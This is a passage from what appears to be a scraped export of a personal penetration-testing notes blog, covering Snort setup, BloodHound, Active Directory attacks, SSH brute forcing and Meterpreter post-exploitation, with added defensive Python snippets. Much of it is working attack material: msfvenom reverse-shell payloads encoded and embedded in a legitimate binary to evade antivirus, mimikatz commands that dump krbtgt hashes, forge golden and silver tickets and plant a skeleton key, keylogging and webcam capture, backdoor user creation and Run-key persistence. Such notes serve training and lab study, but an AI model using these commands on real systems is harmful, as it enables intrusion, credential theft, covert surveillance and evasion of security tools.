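    """Source IPs that fired rule `sid` at least `threshold` times, e.g. an SSH brute force."""
    counts = count_by_rule_and_source(lines)
    return sorted(src for (s, src), n in counts.items() if s == sid and n >= threshold)


# Constructed sample alerts (not captured from a real sensor)
SAMPLE_ALERTS = [
    '05/12-10:21:33.100001  [**] [1:1000001:1] ICMP ping detected [**] [Priority: 0] {ICMP} 192.168.83.128 -> 192.168.83.140',
    '05/12-10:21:34.100002  [**] [1:1000001:1] ICMP ping detected [**] [Priority: 0] {ICMP} 192.168.83.128 -> 192.168.83.140',
    '05/12-10:22:01.200001  [**] [1:1000002:1] SSH connection attempt [**] [Priority: 0] {TCP} 192.168.83.128:51000 -> 192.168.83.140:22',
    '05/12-10:22:01.300001  [**] [1:1000002:1] SSH connection attempt [**] [Priority: 0] {TCP} 192.168.83.128:51001 -> 192.168.83.140:22',
    '05/12-10:22:01.400001  [**] [1:1000002:1] SSH connection attempt [**] [Priority: 0] {TCP} 192.168.83.128:51002 -> 192.168.83.140:22',
    '05/12-10:25:10.000001  [**] [1:1000003:1] FTP login to metasploitable2 [**] [Priority: 0] {TCP} 192.168.83.128:52000 -> 192.168.83.140:21',
    'this line is not an alert and must be ignored',
]

if __name__ == '__main__':
    print(build_local_rules(RULES))
    for key, n in sorted(count_by_rule_and_source(SAMPLE_ALERTS).items()):
        print(key, n)
    print('possible SSH brute force from:', noisy_sources(SAMPLE_ALERTS, 1000002, 3))
```

Write the output of build_local_rules() into /etc/snort/rules/local.rules and restart snort; the same parser works on /var/log/snort/alert when snort runs with -A fast, which is the file you would feed into a real pipeline instead of watching the console.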
I ftp'ed into the vulnerable machine and snort detected it -> Community rules -> If you want to download the snort community rules -> Extract the rules; the cleanest way to use them is to copy the extracted .rules files into /etc/snort/rules and add an include $RULE_PATH/<file>.rules line for each one in snort.conf (individual rules can also be pasted into local.rules). snort rule for the EternalBlue (MS17-010) exploit -> If you want the alerts written to a file instead of the screen, use the fast output mode -> snort -q -l /var/log/snort/ -i ens33 -A fast -c /etc/snort/snort.conf This writes one-line alerts to /var/log/snort/alert (inside the directory given with -l) and prints nothing on the display. Tip To comment out a block of lines in vim use this format :563,695s/^/#/ ':starting_line,last_line{s}/^/character_you_want_to_add{#}/' Check the line numbers with :set number first, since the include block moves between snort.conf versions.\n","permalink":"https://0x-s0M3n4th.github.io/notes/blue-team-ops/01-snort/intrusion-detection-with-snort/","title":"Practical Snort"},{"content":"The following techniques are used by antimalware solutions to detect potential threats:\nSignature based detection Behavioral based detection Heuristic based detection Platforms for analysing a suspicious file (VirusTotal gives a multi-engine static scan; Cuckoo and ANY.RUN are sandboxes that run the sample, i.e. dynamic analysis):\nhttps://www.virustotal.com/ https://cuckoo.cert.ee/ https://app.any.run/ Encoding payloads with MSFVenom: Metasploit Framework Venom (MSFvenom) is commonly used by penetration testers to craft custom payloads for performing exploitation, remote code execution (RCE), and privilege escalation 
on targeted systems. RCE allows an attacker to run arbitrary code on a target machine or in a target process without having physical access to the machine. In addition, this tool enables the penetration tester to perform encoding and obfuscation, altering the appearance of the payload without changing its functionality. These methods are commonly used to evade signature-based detection in antivirus products and in IDSs/IPSs.\nDetermine the IP you want to receive the connection back on, using ifconfig (in the examples below this is the Kali address). Next, use the following command to generate a reverse shell payload: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.83.128 LPORT=1234 -f exe -o payload1.exe COMMAND BRIEF:\n-p: This enables you to specify the payload. The msfvenom --list payloads command displays a list of all supported payloads for MSFvenom. LHOST: This allows you to specify the call-back address, such as the IP address of Kali Linux as the attacker machine. LPORT: This specifies the listening port on the attacker machine; a handler (exploit/multi/handler with the same payload) needs to be listening on this port before the payload is executed on the targeted system. -f: This specifies the output format. The msfvenom --list formats command displays a list of supported output formats. -o: This specifies the name of the output file. By default, the payload is stored within the present working directory; use the pwd command to verify the current directory. Next, open the web browser within Kali Linux, go to https://www.virustotal.com, and upload the newly generated payload to determine its detection status Tip Keep in mind that once you have submitted a file to VirusTotal, the sample and its hash are shared with the antivirus and security vendors that partner with the service, and once it is flagged as malicious, signatures for it follow quickly. Therefore, the time you have to use your payload against the target is drastically reduced; for a real engagement, test against a local copy of the target's antivirus in your lab instead of uploading to VirusTotal.\nApplying some encoding: let's apply encoding to the payload using the shikata_ga_nai encoder module and perform 20 iterations of the encoding to reduce the detection rate of the custom payload msfvenom -p windows/meterpreter_reverse_tcp LHOST=172.30.1.130 LPORT=1234 -a x86 --platform windows -e x86/shikata_ga_nai -i 20 -f exe -o payload2_stageless.exe A staged payload (windows/meterpreter/reverse_tcp) can also be run through shikata_ga_nai, but only the small stager is encoded; the large second stage is sent by the handler at run time and is not touched by msfvenom (Metasploit's EnableStageEncoding option exists for that). The stageless payload (windows/meterpreter_reverse_tcp) carries the whole meterpreter inside the file, so everything on disk goes through the encoder, which is why it is used here. Note also that shikata_ga_nai is itself well known and its decoder stub is fingerprinted by many engines, so iterations alone rarely get a payload past a modern antivirus. Next, let's generate another custom payload and embed it within an existing executable file: msfvenom -p windows/meterpreter_reverse_tcp LHOST=172.30.1.130 LPORT=1234 -x /usr/share/windows-binaries/whoami.exe -a x86 --platform windows -e x86/shikata_ga_nai -i 20 -f exe -o payload3.exe -x injects the payload into the given template binary, so the output keeps the icon, size and metadata of whoami.exe. As shown in the preceding screenshot, payload3.exe has a lower detection rating compared to the previous custom payloads. It's important to enumerate running services and applications on a targeted system to determine whether the host is running a specific antimalware solution, then test the payload in a lab environment against that product to ensure it works as expected before delivering it to the target. 
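What the encoding step above buys and what it does not, as an added Python example (this is not msfvenom's code and not a real encoder): a toy XOR pass with a random one-byte key, applied for N iterations like -i N, shows that every build has a different SHA-256 (so a hash shared through VirusTotal says nothing about the next build), that a byte signature written for the raw payload no longer matches, and that the decoded bytes are unchanged. It also shows the flip side: the constant decoder marker every build carries is exactly what a signature for the encoder itself catches. PAYLOAD and SIGNATURE are constructed sample bytes, not shellcode.

```python
import hashlib
import os

# Added example for the encoding discussion above; it is not msfvenom's code and
# not a real encoder.  A toy XOR pass with a random one-byte key shows the two
# effects the notes rely on: every build has a different SHA-256 and a byte
# signature for the raw payload no longer matches, while the decoded bytes are
# unchanged.  PAYLOAD and SIGNATURE are constructed sample bytes, not shellcode.
PAYLOAD = b'\x90\x90fake-meterpreter-stage-bytes\x90\x90'
SIGNATURE = b'meterpreter-stage'   # what a naive byte-pattern AV rule would look for
MAGIC = b'XOR1'                    # the decoder "stub" every build carries unchanged


def random_key():
    return 1 + os.urandom(1)[0] % 255      # never 0, which would be a no-op


def encode_once(data, key=None):
    """One pass: MAGIC + key byte + (data XOR key)."""
    if key is None:
        key = random_key()
    return MAGIC + bytes([key]) + bytes(b ^ key for b in data)


def decode_once(blob):
    if not blob.startswith(MAGIC):
        raise ValueError('not an encoded blob')
    key = blob[len(MAGIC)]
    return bytes(b ^ key for b in blob[len(MAGIC) + 1:])


def encode(data, iterations, keys=None):
    """Apply `iterations` passes, like msfvenom -i N; keys may be fixed for tests."""
    out = data
    for i in range(iterations):
        out = encode_once(out, None if keys is None else keys[i])
    return out


def decode(blob, iterations):
    out = blob
    for _ in range(iterations):
        out = decode_once(out)
    return out


def sha256(data):
    return hashlib.sha256(data).hexdigest()


def signature_hits(data, patterns):
    """Which byte patterns occur in data: a stand-in for signature scanning."""
    return [p for p in patterns if p in data]


def compare_builds(data, iterations=20):
    """Two builds with fresh keys: same decoded bytes, different hashes."""
    a, b = encode(data, iterations), encode(data, iterations)
    return {
        'same_plaintext': decode(a, iterations) == decode(b, iterations) == data,
        'same_hash': sha256(a) == sha256(b),
        'raw_hits': signature_hits(data, [SIGNATURE, MAGIC]),
    }


if __name__ == '__main__':
    print(compare_builds(PAYLOAD))
    built = encode(PAYLOAD, 20)
    # the constant stub is what a signature written for the *encoder* catches
    print('hits in encoded build:', signature_hits(built, [SIGNATURE, MAGIC]))
```

shikata_ga_nai is stronger than this toy because its decoder stub is polymorphic, but the principle is the same: detection engines that emulate the decoder or fingerprint its structure see through it, which is why the notes end up embedding the payload in a legitimate binary and testing against the real product.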
","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/06-understading-network-pentesing/02-anti-mlaware-evasion-techniques/","title":"Anti-Malware Evasion Techniques"},{"content":"BloodHound is an Active Directory data visualization application that helps penetration testers efficiently identify the attack path to gain control over a Windows Active Directory domain and forest. In addition, it helps with identifying the misconfigurations and relationships that could be exploited by threat actors. Furthermore, BloodHound uses graph theory to reveal hidden relationships within an Active Directory environment: users, groups and computers are nodes, relationships such as MemberOf, AdminTo and HasSession are edges, and a privilege escalation path is simply a path through that graph. Overall, the data in Active Directory must be collected from the organization using a collector such as BloodHound-Python, SharpHound, or AzureHound. Once the data has been collected, it has to be ingested by BloodHound, which then shows the attack paths to domain takeover within an organization.\nThe following is a breakdown of each type of collector used by BloodHound:\nSharpHound is the most commonly used data collector for BloodHound, designed to collect data from on-prem AD environments; it is a .NET binary run on a domain-joined Windows host. BloodHound-Python is an alternative to SharpHound that collects similar data over LDAP and SMB from a non-Windows host such as Kali, and is most suitable when executing .NET binaries on the target is restricted or monitored. AzureHound is designed to collect data from Azure AD (now Microsoft Entra ID), allowing BloodHound to analyze and visualize attack paths in cloud environments. Bloodhound setup: Using docker containers: In my case I faced an issue later on, so if you also face the issue then follow the commands after doing docker-compose up, and remember to restart your system after performing these commands. 
After restarting, run docker-compose up again. Make sure port 8080 is not used by any other service; if it is, use the following commands to find and kill the process listening on port 8080 sudo netstat -tulnp | grep \"8080\" sudo kill -9 PID 5. Then run docker-compose up again; you should get messages like these: 6. Now head over to Firefox, open http://127.0.0.1:8080, and this page should come up; enter your credentials: 7. This upload page should come up first; ignore the background data: 8. We need to ingest our domain controller's data into BloodHound using any compromised domain account; this maps the whole domain into a visual graph. To do so we need another tool, bloodhound-python, to gather that data from the DC (the collector does not need admin rights: any domain user can read most of this data over LDAP, which is exactly why the graph is so useful to an attacker). Use the following steps:\nsudo apt install bloodhound.py bloodhound-python -d MARVEL.local -u fcastle -p Password1 -ns 10.11.12.128 -c All COMMAND DETAILS:\n-d: Specifies the targeted Active Directory domain. -u: Specifies the username of a valid domain user. -p: Specifies the password for the domain user. -ns: Specifies the name server, i.e. the IP address of the domain controller, used to resolve the domain's DNS names. -c: Specifies the collection method. All runs every method except LoggedOn; the Session and LocalAdmin methods it includes connect to each computer in the domain, which is noisy, whereas DCOnly talks to the domain controller only. 9. Now upload all of the JSON files inside BloodHound 10. Then go to the Cypher tab in BloodHound 11. Click on saved queries, then click all domain admins 12. This shows us all the Domain Admins we are facing at this point: 13. We can click on any of the nodes to get more information: 
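What the "shortest path to domain admins" saved query used in these steps actually computes, as an added Python example (this is not BloodHound's code): BloodHound's graph has principals as nodes and relationships as edges, and the query is a shortest-path search over it, here a breadth-first search. The edges below are constructed sample data for the MARVEL.local lab using BloodHound's own edge names (MemberOf, AdminTo, HasSession, CanRDP); apart from fcastle, the host and user names are made up.

```python
from collections import deque

# Added example, not BloodHound's own code: the "shortest path to Domain Admins"
# query is a shortest-path search on a graph whose nodes are AD principals and
# whose edges are BloodHound relationships.  The edges below are constructed
# sample data for the MARVEL.local lab, not collector output; the edge names are
# the BloodHound edge types they imitate (computer -HasSession-> user, etc.).
DOMAIN_ADMINS = 'DOMAIN ADMINS@MARVEL.LOCAL'

EDGES = [
    ('FCASTLE@MARVEL.LOCAL',       'MemberOf',   'DOMAIN USERS@MARVEL.LOCAL'),
    ('FCASTLE@MARVEL.LOCAL',       'AdminTo',    'PUNISHER.MARVEL.LOCAL'),
    ('PUNISHER.MARVEL.LOCAL',      'HasSession', 'ADMINISTRATOR@MARVEL.LOCAL'),
    ('ADMINISTRATOR@MARVEL.LOCAL', 'MemberOf',   DOMAIN_ADMINS),
    ('PPARKER@MARVEL.LOCAL',       'MemberOf',   'DOMAIN USERS@MARVEL.LOCAL'),
    ('DOMAIN USERS@MARVEL.LOCAL',  'CanRDP',     'SPIDERMAN.MARVEL.LOCAL'),
]


def build_graph(edges):
    """Adjacency list: node -> list of (edge_type, neighbour)."""
    graph = {}
    for src, etype, dst in edges:
        graph.setdefault(src, []).append((etype, dst))
        graph.setdefault(dst, [])
    return graph


def shortest_path(graph, start, target):
    """BFS; returns [(node, edge_type, node), ...] or None when no path exists."""
    if start not in graph:
        return None
    parent = {start: None}
    queue = deque([start])
    while queue:
        node = queue.popleft()
        if node == target:
            path = []
            while parent[node] is not None:
                prev, etype = parent[node]
                path.append((prev, etype, node))
                node = prev
            return list(reversed(path))
        for etype, nxt in graph[node]:
            if nxt not in parent:          # first visit is the shortest in an unweighted graph
                parent[nxt] = (node, etype)
                queue.append(nxt)
    return None


def reachable_domain_admin_paths(graph, target=DOMAIN_ADMINS):
    """Every principal (user or group) with a path to the target, with its hop count."""
    out = {}
    for node in graph:
        if '@' in node and node != target:
            path = shortest_path(graph, node, target)
            if path:
                out[node] = len(path)
    return out


if __name__ == '__main__':
    g = build_graph(EDGES)
    for hop in shortest_path(g, 'FCASTLE@MARVEL.LOCAL', DOMAIN_ADMINS):
        print('%s -[%s]-> %s' % hop)
    print(reachable_domain_admin_paths(g))
```

With the sample data, fcastle (a plain domain user) reaches Domain Admins in three hops through a local admin right on a workstation where an administrator has a session, which is the classic path BloodHound surfaces; pparker has no path at all. Real collector output has thousands of edges and many more edge types (ACL edges such as GenericAll, trusts, GPO links), but the search is the same.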
14. This tool can also map attack paths; use the saved query shortest path to domain admins: ","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/10-active-directory-attacks/02-bloodhound/","title":"BloodHound"},{"content":"IN THIS SECTION WE WILL LEARN ABOUT 3 TECHNIQUES: 1. GOLDEN TICKET, 2. SILVER TICKET AND 3. SKELETON KEY\nGOLDEN TICKET: A golden ticket is a forged Kerberos TGT that a penetration tester creates using the Security Identifier (SID) of the domain, the domain name, and the NTLM hash (the RC4 Kerberos key) of the krbtgt account. The golden ticket allows a penetration tester to gain access to any device within the domain by performing PTT (Pass The Ticket). This is possible because every real TGT is encrypted, and its PAC checksummed, with the key of the Kerberos TGT account, the built-in krbtgt account on Active Directory; whoever holds that key can mint a TGT the KDC accepts without ever having asked the KDC for one. 
This golden ticket allows anyone to impersonate any user, with the privileges of the impersonated user, on systems within the domain. What makes this attack so persistent is that changing the krbtgt password once does not stop it: the KDC keeps the previous krbtgt key and still accepts tickets encrypted with it, so the password has to be changed twice (with time for replication in between) to invalidate forged tickets.\nPRACTICAL DEMO: Fire up Windows Server 2022 and log in as either the Domain Admin or SQLService (the demo dumps the krbtgt key from the DC itself, so the starting point is already domain-admin-level access; a golden ticket is a persistence technique, not a privilege escalation one). Make sure mimikatz is installed beforehand. Open PowerShell with admin privileges, and launch mimikatz. Use Mimikatz to extract the domain SID and the NTLM hash of the Kerberos TGT account (krbtgt) using the following command: lsadump::lsa /inject /name:krbtgt Next, use Mimikatz to create a golden ticket by providing the domain SID and the krbtgt NTLM hash using the following command: kerberos::golden /user:NotAdmin /domain:MARVEL.local /sid:S-1-5-21-2562431693-949040921-1798036828 /krbtgt:2b7d48bc87107f73c48ea100ca97e7e1 /id:500 /ticket:golden_ticket The username specified in the preceding command does not necessarily need to be a valid user on the domain. Furthermore, using the ID (RID) of 500 makes the ticket represent the built-in Administrator account on the domain. The /ticket option lets us specify the file name of the ticket when it is created. The golden ticket is stored offline, as a kirbi-format file, within the Mimikatz directory. 
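The defender's view of the ticket forged above, as an added Python example (this is not code from the notes and not a Windows API): a golden ticket built with these options gives itself away through a principal that does not exist in the directory, RID 500 attached to a name other than Administrator, a lifetime far beyond the domain maximum, and an RC4 ticket in a domain that otherwise uses AES (the RC4 indicator only applies in an AES-only domain, hence the aes_only switch). The user list and ticket records are constructed sample data, modelled loosely on what a directory export, klist and Kerberos TGS events (4769) expose; they are not real event records.

```python
# Added example, not part of the original notes and not a Windows API: a
# defender-side check for what the ticket forged above gives away.  The user
# list and ticket records are constructed sample data, modelled loosely on what
# a directory export, klist and Kerberos TGS events (4769) expose; they are not
# real event records.
MAX_TGT_LIFETIME_MIN = 600   # AD default "Maximum lifetime for user ticket" (10 h)
RC4_HMAC = 0x17              # etype of a ticket built from an NTLM hash (/krbtgt:<hash>)
AES256 = 0x12

DOMAIN_USERS = {'administrator': 500, 'fcastle': 1103, 'sqlservice': 1105}   # sAMAccountName -> RID

TICKETS = [
    {'user': 'fcastle',    'rid': 1103, 'etype': AES256,   'lifetime_min': 600},
    {'user': 'NotAdmin',   'rid': 500,  'etype': RC4_HMAC, 'lifetime_min': 2147483647},
    {'user': 'sqlservice', 'rid': 1105, 'etype': RC4_HMAC, 'lifetime_min': 600},
]


def ticket_indicators(ticket, users=DOMAIN_USERS, max_lifetime_min=MAX_TGT_LIFETIME_MIN,
                      aes_only=True):
    """Reasons a TGT looks forged; an empty list means nothing odd."""
    reasons = []
    name = ticket['user'].lower()
    if name not in users:
        reasons.append('principal does not exist in the domain')
    elif users[name] != ticket['rid']:
        reasons.append('RID %d does not belong to %s' % (ticket['rid'], name))
    if ticket['lifetime_min'] > max_lifetime_min:
        reasons.append('lifetime %d min exceeds domain maximum %d min'
                       % (ticket['lifetime_min'], max_lifetime_min))
    if aes_only and ticket['etype'] == RC4_HMAC:
        reasons.append('RC4 ticket in an AES-only domain')
    return reasons


def suspicious_tickets(tickets, **kw):
    """user -> indicators, for the tickets that have any."""
    out = {}
    for ticket in tickets:
        reasons = ticket_indicators(ticket, **kw)
        if reasons:
            out[ticket['user']] = reasons
    return out


def krbtgt_reset_complete(hours_between_resets, max_lifetime_min=MAX_TGT_LIFETIME_MIN):
    """True when krbtgt has been reset twice with at least one ticket lifetime in between.

    One reset leaves the previous key accepted, so forged tickets keep working;
    the second reset retires it.  Waiting a full ticket lifetime (and for
    replication) between the two keeps legitimate sessions from breaking.
    """
    return hours_between_resets * 60 >= max_lifetime_min


if __name__ == '__main__':
    for user, reasons in suspicious_tickets(TICKETS).items():
        print(user, '->', '; '.join(reasons))
    print('double krbtgt reset complete:', krbtgt_reset_complete(24))
```

The first indicator is the one that matters most in practice: a forged TGT for a user the directory has never heard of still works for service tickets because the KDC trusts the encrypted ticket, not the account, which is exactly the gap the forged NotAdmin ticket exploits. Mimikatz can also take /aes256: instead of /krbtgt:, which removes the RC4 indicator, so do not rely on that one alone.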
The forged ticket, once injected, lets the penetration tester access any system on the domain from the current session.\nCreating a super golden ticket for the maximum validity period: kerberos::golden /user:NotAdmin /domain:MARVEL.local /sid:S-1-5-21-2562431693-949040921-1798036828 /krbtgt:2b7d48bc87107f73c48ea100ca97e7e1 /id:500 /endin:2147483647 /ticket:super_golden_ticket The /endin option sets the ticket lifetime in minutes (mimikatz defaults to 10 years; 2147483647 minutes is roughly 4000 years). A lifetime like that is far outside any domain policy (10 hours by default), which makes such a ticket easy to spot in klist output or in Kerberos event logs.\nPass the ticket with mimikatz: kerberos::ptt golden_ticket To open a Command Prompt with the golden ticket session, use the following Mimikatz command: misc::cmd On the cmd try these 2 commands, whoami and klist: As shown in the preceding screenshot, when the whoami command is executed, the output shows the sqladmin account is currently logged on to the system, but the klist command reveals this Command Prompt session is using the NotAdmin user with the golden ticket (whoami reports the local logon token; the Kerberos ticket is what remote services see when you authenticate to them). Therefore, you can access any device on the network using the golden ticket from this Command Prompt session. Note As previously mentioned in this chapter, changing the krbtgt account password once does not invalidate tickets forged with the old krbtgt key; changing the password twice (allowing replication and at least one maximum ticket lifetime between the two changes) will invalidate them.\nLearn more about mimikatz\nSilver ticket: Open the domain controller and log in as either the service account or DOMAIN ADMIN. Then load mimikatz in PowerShell (opened as admin). Next, retrieve the SID of the domain and the NTLM hash of the account that runs the target service, i.e. a service account with a registered SPN or, for services run by the machine itself such as HOST and CIFS, the computer account: lsadump::lsa /patch HASH OF THE DC (the HYDRA-DC$ computer account) Important You can also use the lsadump::lsa /inject /name:sqlservice command to retrieve the NTLM hash of a specific account with Mimikatz.\n4. Next, let's use Mimikatz to create a silver ticket with a fake username, the domain name, the domain SID, the NTLM (RC4) hash of the domain controller's computer account (HYDRA-DC$), and the target as the domain controller. 
The service to impersonate will be HOST:\nkerberos::golden /user:SilverTicket /domain:MARVEL.local /sid:S-1-5-21-2562431693-949040921-1798036828 /rc4:d74d80c4ca134b7558c663b13566a112 /id:1234 /target:HYDRA-DC.MARVEL.local /service:HOST /ticket:silver_ticket A silver ticket is a forged service ticket (TGS), not a TGT: it is encrypted with the service account's key, so it only works against that one service on that one host, but the domain controller is never contacted when it is used, so no 4768/4769 events are logged for it. 5. Now use the same kerberos::ptt and misc::cmd commands as for the golden ticket to perform PTT and get a cmd session: SKELETON KEY: Use the following commands to load the Mimikatz driver on the domain controller, strip the protection from lsass.exe and patch in the skeleton key: mimikatz # privilege::debug mimikatz # !+ mimikatz # !processprotect /process:lsass.exe /remove mimikatz # misc::skeleton mimikatz # !- (!+ loads the mimidrv kernel driver, which means installing a driver on the DC and is itself a loud indicator; !- unloads it afterwards.) 2. Then open a command prompt using that skeleton key Important When using the skeleton key, you can authenticate to any device on the domain using a valid username and the password mimikatz (the default skeleton key password), while the real password of every user keeps working as well. However, keep in mind that any host you're attempting to access with the skeleton key needs to authenticate against the patched domain controller; in a domain with several DCs, logons handled by an unpatched DC will fail with the skeleton password. If the domain controller reboots, the skeleton key is lost: Mimikatz patches the authentication code resident in LSASS memory, so the change does not persist through a reboot unless specific measures are taken to ensure persistence.\nOn the new Cmd use the command powershell to spawn a PowerShell session. 
Access the domain controller using the following command: Enter-PSSession -ComputerName HYDRA-DC -credential MARVEL\\Administrator Provide the password of the domain admin (with the skeleton key in place, mimikatz is accepted here as well as the real password): Use the following commands to verify: Further reading: • Understanding Kerberos – https://www.techtarget.com/searchsecurity/definition/Kerberos • OS Credential Dumping: NTDS – https://attack.mitre.org/techniques/T1003/003/ • OS Credential Dumping: LSA Secrets – https://attack.mitre.org/techniques/T1003/004/ • LLMNR/NBT-NS Poisoning and SMB Relay – https://attack.mitre.org/techniques/T1557/001/ • Active Directory Security – https://adsecurity.org/\n","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/11-advanced-ad-attacks/02-domain-dominance-and-persistence/","title":"Domain Dominance and Persistence"},{"content":" Now, after misconfiguring ssh, we will exploit it using some basic techniques. Scanning the target Windows server: Performing user enumeration: Open msfconsole Once it's loaded, use the ssh_enumusers module use auxiliary/scanner/ssh/ssh_enumusers 3. Settings: This didn't give any results because the OpenSSH server is up to date: the module relies on timing and malformed-packet differences between valid and invalid usernames (CVE-2018-15473 and older tricks), and modern OpenSSH releases are patched against them. In an actual pentest we would have hit a wall here, but as we know the username and password, we can try login brute force attacks\nFirst we will try msfconsole's ssh_login module: Options: It will take a significant amount of time if you don't have the actual credentials; if you have them, that's a plus point. NEVER PERFORM BRUTE FORCE ATTACKS IN AN INTERNAL NETWORK IN A PENTEST WITHOUT EXPLICIT AUTHORISATION: every failed attempt is logged, and an account lockout policy can lock out real users. Now, in an actual scenario a sysadmin would check the logs immediately, so we will do the same: On opening that file you can see the failed logon attempts being collected continuously, one entry per attempt with the source address, which is why a brute force from a single host is so easy to spot. Using the medusa tool for brute forcing: medusa -h 192.168.83.140 -U username.txt -P passwords.txt -M ssh ","permalink":"https://0x-s0M3n4th.github.io/notes/pen-testing-notes/network-pentesting/07-performing-network-penetration-testing/02-gaining-access-by-exploiting-ssh/","title":"Gaining Access by Exploiting SSH"},{"content":" First get a reverse shell from the target machine; in my case it is Blue and the attacker is kali. Also, I have added Blue to the vmnet2 aka PIVOT-NET network. Let's use the EternalBlue (MS17-010) exploit to get a reverse shell: user interface options: Establishing a Meterpreter interactive session between the compromised system and your attacker machine enables you to perform actions to collect sensitive and confidential information from the target system. The following is a brief list of useful commands that are used within Meterpreter:\nkeyscan_start: Meterpreter begins capturing the keystrokes entered by a user on the compromised host. keyscan_stop: Stops capturing the keystrokes entered by a user on the compromised system. keyscan_dump: Dumps the keystrokes captured so far to the console. screenshot: Meterpreter will capture a screenshot of the desktop on the compromised host. 
screenshare: Begins a real-time stream showing the live actions performed by a user on the compromised host. record_mic: Meterpreter activates the microphone on the compromised host and begins recording. webcam_list: Displays a list of webcams available on the compromised host. webcam_snap: Activates the webcam on the compromised host and takes a picture. webcam_stream: Begins a live stream from the webcam on the compromised system. search: The search -f <filename> command quickly searches the compromised system for the file (wildcards work, e.g. search -f *.kdbx). Keystroke, screen, microphone and webcam capture only belong in an engagement when the rules of engagement explicitly allow them. File transfers: To upload a file such as a malicious payload, Meterpreter supports file transfers between the attacker and the compromised host. meterpreter > upload /usr/share/windows-binaries/vncviewer.exe c:\\\\ 2. Spawning a native shell from meterpreter: 3. If we look at the root of the C: drive we can verify whether our file was uploaded: 4. Use the following command to download a file from the C: directory of the target to the /home/kali/ directory on Kali Linux:\nmeterpreter > download c:\\\\jack_of_diamonds.png /home/kali/ Important The double backslashes (\\\\) are used as escape characters for Windows-style directory paths and are necessary for Meterpreter to interpret the path correctly\nprivilege escalation using meterpreter: After exploiting a security vulnerability and gaining either a reverse or bind shell, you may not be able to perform administrative actions or tasks on the compromised system due to having low privileges on the compromised machine. Therefore, it's important to understand the need to escalate your user privileges to a high-privilege user such as the local administrator, a domain administrator, or even the SYSTEM level. 
Escalating your user privileges on a compromised system allows you to modify configurations and perform administrative functions on the victim machine.\nOn Meterpreter, use the getuid command to verify the user that Meterpreter is currently running as on the compromised host. Next, execute the use priv command within Meterpreter to load the privilege extension if it is not loaded already, then run getsystem, which tries several local techniques (named-pipe impersonation and token duplication) to obtain SYSTEM. I already had NT AUTHORITY\\SYSTEM from the MS17-010 exploit, so there was nothing for it to do. Types of tokens: Delegate tokens: This token is created on a system when a user logs in interactively and provides the privileges that allow the user to perform actions within the limits of their user privileges; it can also be used to authenticate to other systems on the network. Additionally, this type of token is created when a user remotely accesses a Windows host using Microsoft's RDP. Impersonate tokens: This type of token is created by non-interactive logons (for example a user mapping a file share or network drive) and is only valid for actions on the local host; it cannot be used to authenticate to remote network services. Open the reverse shell session, then type load incognito, after that list_tokens -u to see the available tokens. If you do a getuid to check your identity, in my case it's already SYSTEM, which is the highest privilege possible, so I don't need to impersonate tokens. But you can do that using the command: meterpreter > impersonate_token \"NT AUTHORITY\\\\SYSTEM\" (the backslash has to be doubled, as with file paths). Another technique to impersonate a user such as the local Administrator is to identify a running process on the compromised system that runs with the Administrator's privileges and steal the token of that process. Use the ps command to identify it: Let's say I want the token of this process (migrate would move Meterpreter into the process instead; steal_token only borrows its token): to steal the token use the command: steal_token PID Lastly, to revert to SYSTEM-level privileges on Meterpreter, use the rev2self command, which drops the impersonated token and returns to the original one. 
Setting up persistence: After remotely exploiting a security vulnerability within a host, the payload is usually delivered, which allows the penetration tester to gain a reverse shell on the target. Since Meterpreter runs within the memory of the target, the session will be terminated when the compromised host loses power, reboots, or reaches an inactivity timeout. Implementing persistence on the compromised host ensures the penetration tester always has access to the target whenever it is online.\nMeterpreter allows penetration testers to remotely enable RDP on a compromised Windows operating system: meterpreter > run post/windows/manage/enable_rdp 2. Use the shell command within Meterpreter to spawn a Windows native shell, then use the net user pentester password1 /add command to create a new user on the compromised host (for that user to log in over RDP it also has to be in the Remote Desktop Users or Administrators group, e.g. net localgroup \"Remote Desktop Users\" pentester /add): 3. Metasploit contains two specific exploit modules that enable penetration testers to set up persistence on a compromised Windows host. These modules are as follows:\nexploit/windows/local/persistence exploit/windows/local/registry_persistence Both modules install a payload that is launched from a Run key under HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ (or the HKCU equivalent when STARTUP is USER), causing the payload to execute each time the system boots or when a user logs on. The persistence module drops a VBS script into the temp directory (C:\\WINDOWS\\TEMP\\ when installed as SYSTEM) and points the Run key at it; registry_persistence instead stores the payload blob inside the registry and uses a Run key that launches PowerShell to load it, so it leaves no script on disk. These are very dangerous and should be removed when you have completed the technical part of the penetration test within the organization (the persistence module prints the path of a cleanup resource script for this purpose). If these payloads are not removed from the registry and the TEMP folder, a threat actor can use them to gain access to the host without any further authentication. 
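A check for what the two modules leave behind, as an added Python example (this is not Metasploit's code): it parses the output of reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run, flags values that point at a script in a temp directory, use a script host, or launch hidden or encoded PowerShell, and produces the reg delete / del commands that would remove them, which is the cleanup the paragraph above asks for (and the hunt a blue team would run). The reg query output is a constructed sample; the value names and script path in it are made up.

```python
import re

# Added example, not Metasploit's code: an audit of Run-key entries of the kind
# the two persistence modules leave behind, so they can be found and removed at
# the end of the engagement (or by the blue team).  REG_OUTPUT is a constructed
# sample in the layout 'reg query <key>' prints; it is not taken from a real
# host, and the value names and script path are made up.
REG_OUTPUT = r'''
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
    VMwareTools    REG_SZ    "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe" -n vmusr
    hZkqLpXw    REG_SZ    wscript.exe //B //NOLOGO C:\WINDOWS\TEMP\rtyUio.vbs
    kXwPzQ    REG_SZ    powershell.exe -w hidden -nop -enc SQBFAFgAIAAoAE4AZQB3...
'''

VALUE_LINE = re.compile(r'^\s{2,}(?P<name>\S+)\s+(?P<type>REG_\w+)\s+(?P<data>.*)$')
SCRIPT_PATH = re.compile(r'[A-Za-z]:\\[^\s"]+\.(?:vbs|ps1|bat|hta|js)\b', re.I)

# Each (label, regex) is one indicator; a value matching any of them is reported.
INDICATORS = [
    ('script in a temp directory',
     re.compile(r'(?:\\(?:windows\\)?temp|%temp%)\\[^\s"]+\.(?:vbs|ps1|bat|hta|js)\b', re.I)),
    ('script host launching a file',
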